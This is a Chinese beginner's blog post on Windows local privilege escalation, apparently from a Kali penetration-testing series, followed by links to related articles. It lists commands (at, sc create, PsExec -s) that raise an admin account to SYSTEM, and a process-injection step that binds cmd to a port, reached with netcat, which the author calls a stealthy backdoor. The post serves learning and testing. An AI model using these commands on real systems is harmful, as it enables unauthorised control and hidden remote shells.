本地提权
简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限。权限提升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更高的状态。但并不是说这种漏洞不严重、难以利用,往往这种漏洞更容易被利用、带来的后果比远程漏洞更可怕,这种漏洞实际上远比远程漏洞稀有,往往一个微软本地提权漏洞在国外的价格就可以到几百万美金。因为远程漏洞其实是很普遍的,一个网站存在网页问题,就可能被篡改,传入WEBSHELL(一种控制网站机器的网页控制端),但此时权限是非常低的,黑客无法种植木马,控制目标机器,也无法渗透到服务器更深层的机器,在企业内网和这个内网也是这样,通常这些网络环境中都有用户权限控制,即使误中木马,也不会造成影响,更无法传播,但是上面这些在存在提权漏洞的机器上都是可以彻底突破的。
提权方法传送门:http://www.360doc.com/content/06/0614/20/2311_134707.shtml
Windows系统用户权限划分:
Administrators,管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以,只有受信任的人员才可成为该组的成员。 
Users:普通用户组,这个组的用户无法进行有意或无意的改动。因此,用户可以运行经过验证的应用程序,但不可以运行大多数旧版应用程序。Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上,默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站,但不能关闭服务器。Users 可以创建本地组,但只能修改自己创建的本地组。 
System:拥有和Administrators一样、甚至比其还高的权限,但是这个组不允许任何用户的加入,在察看用户组的时候,它也不会被显示出来,它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。

Linux系统用户权限划分

Users:普通用户

Root:管理员账号

windows系统下提权【可用命令行,也可用图形化界面】

net命令

#HelpAssistant:用于远程协助的账号;##SUPPORT——338945a0:用于支持

net user Xuan ##可查看当前账号信息

提权:【管理员权限提升为System权限】

1、at命令【at /?】##只能在XP与2003的系统上使用

at <time> /interactive cmd   ##指定时间,使用交互命令防止在后台运行



###使用taskmgr命令杀死现用户桌面进程,重启,则整个界面都在管理员



则此时使用任何操作都是在System账号下


2、sc命令##可在win7、win8上使用【原理:创建一个服务(默认情况工作在system账号下)】

sc Create syscmd binPath= "cmd /K start" type= own type= interact【重启一个命令行窗口 类型为拥有】

默认情况下没启动

命令行下可用sc start syscmd

3、

windows系统有提供一个套件【搞windows系统的人都应该去学习该套件的使用】

https://technet.microsoft.com/en-us/sysinternals/bb545027  参考书籍:windows internals

###whoami插件,复制到C盘system32,运行

###PsExec.exe -i -s cmd  【-i交互模式,-s使用system账号】

4、注入进程提权【相当于开了一个后门,隐蔽性极高】

将进程注入system服务进程

pinjector.exe进程注入器

http://www.tarasco.org/security/Process_Injector/

###pinjector.exe -l#查看可注入进程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports>  

小白日记,未完待续……

小白日记21:kali渗透测试之提权(一)--本地提权相关推荐

  1. Kali渗透测试之端口扫描1——UDP、TCP、僵尸扫描、隐蔽扫描

    端口扫描 每个服务器上面都会跑很多应用,每个应用都会侦听某些端口,通过侦听端口接收来自客户端或其他用户对应用程序的访问.所以在发现目标主机存活后,我们需要知道目标主机上都开放了那些端口,应用程序的漏洞 ...

  2. Kali渗透测试之主动侦查和被动侦查以及maltego的使用

    Kali渗透测试之maltego注册和使用 一.注册maltego 1.打开命令行终端,可以在kali桌面右键打开,也可以使用快捷键Ctrl+Alt+T打开 kali本身应该已经自带maltego,但 ...

  3. 小白日记22:kali渗透测试之提权(二)--抓包嗅探

    抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码. Windows系统 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只会抓取识别传输密码的明文协议, ...

  4. 小白日记10:kali渗透测试之端口扫描-UDP、TCP、僵尸扫描、隐蔽扫描

    端口扫描 二三四层发现的目的只是为了准确发现所有活着主机IP,确定攻击面,端口扫描即发现攻击点,发现开放端口.端口对应网络服务及应用端程序,服务端程序的漏洞通过端口攻入.[所有的扫描结果,都不要完全相 ...

  5. 小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0

    Linux系统下穿越火线-缓冲区溢出 原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞. 工具: 调试工具:edb: ###python在漏洞溢出方面的渗透测 ...

  6. 112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权msf本地提权]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LPK.DDL劫持提权 1.sethc.exe是什么: 2.lpk.dll出现的背景: 3.Windows查 ...

  7. Kali渗透测试之提权2——WCE、fgdump、mimikatz

    一.WINDOWS身份认证过程 在登录窗口输入账号和密码后,winlogon.exe会将输入的密码进行lmhash和nthash加密: 然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成 ...

  8. 小白日记5:kali渗透测试之被动信息收集(四)--theHarvester,metagoofil,meltag,个人专属密码字典--CUPP

    1.theHarvester theHarvester是一个社会工程学工具,它通过搜索引擎.PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息. ...

  9. 小白日记2:kali渗透测试之被动信息收集(一)

    一.被动信息收集 被动信息收集指的是通过公开渠道可获得的信息,与目标系统不产生直接交互,尽量避免留下一切痕迹的信息探测.被动探测技术收集的信息可以大致分为两类, 即配置信息和状态信息. 被动探测可收集 ...

最新文章

  1. (转)SQL操作全集
  2. Python数据分析之初识numpy常见方法使用案例
  3. UART_SEND详细设计方案
  4. oracle的iw算法,[转载]Oracle日期周详解IW
  5. HTML5简易在线画图工具
  6. 类的静态成员函数和静态成员变量的使用
  7. numpy randn 和_人生苦短,自学python——numpy模块
  8. 基于django快速开发一个网站(一)
  9. androidStudio项目删除模块后报错解决办法
  10. 【动态规划 回文串11】LeetCode 516. Longest Palindromic Subsequence
  11. 完全掌握AS中点(.)语法的应用
  12. 《linux核心应用命令速查》连载二:lastcomm:显示以前使用过的命令的信息
  13. 量化投资与信用风险机器学习建模
  14. face++人脸识别源码
  15. 安卓4.X的桌面启动器-尖端启动器APEX_我是亲民_新浪博客
  16. winhex先Add再XOR后的数据恢复
  17. Vivado FIFO IP核设置
  18. 怎样刻录系统启动光盘
  19. 这些百度搜索技巧,你知道吗?
  20. 微博营销,究竟该怎么做?(实战系列一:粉丝篇)

热门文章

  1. 快速打造人像照片添加烟雾光斑效果
  2. oracle 双层循环,oracle goldengate 双活复制避免循环复制参数
  3. C++浅谈构造函数和析构函数
  4. 现在电脑的主流配置_主流游戏主机 2019年九代i59400F配GTX1060独显电脑装机配置清单...
  5. 优化mysql数据库_MySQL数据库优化技巧大全
  6. ARM 平台跑VXI 11 服务器 调试记录
  7. [置顶]年少痴狂,怀恋曾经的创业岁月,语音识别的应用远远未到高潮,本人的软件源码开源,需要的留下Email,我给大家发...
  8. 分享一下QII10.1河蟹文件
  9. 云计算运维需要经常上夜班吗?需要倒班吗?
  10. 【Tensorflow2.0】tensorflow中的Dense函数解析